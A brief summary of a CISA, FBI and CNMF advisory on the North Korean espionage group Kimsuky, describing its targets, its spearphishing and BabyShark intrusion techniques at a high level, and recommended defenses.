CISA, FBI, and U.S. Cyber Command’s CNMF described Kimsuky as a North Korean APT group conducting global intelligence collection on issues of interest to Pyongyang, including Korean Peninsula policy, nuclear policy, sanctions, and targets in South Korea, Japan, and the United States. The advisory emphasizes spearphishing attachments and links, rapport-building emails, watering holes, credential theft, and malicious browser extensions as initial-access methods. Kimsuky commonly delivers BabyShark through HTA/VBS execution, uses mshta, PowerShell, Windows command shell, registry run keys for persistence, and C2 communications for host profiling and tasking. The report recommends heightened defenses against spearphishing, multi-factor authentication, and user-awareness controls for organizations in the target profile.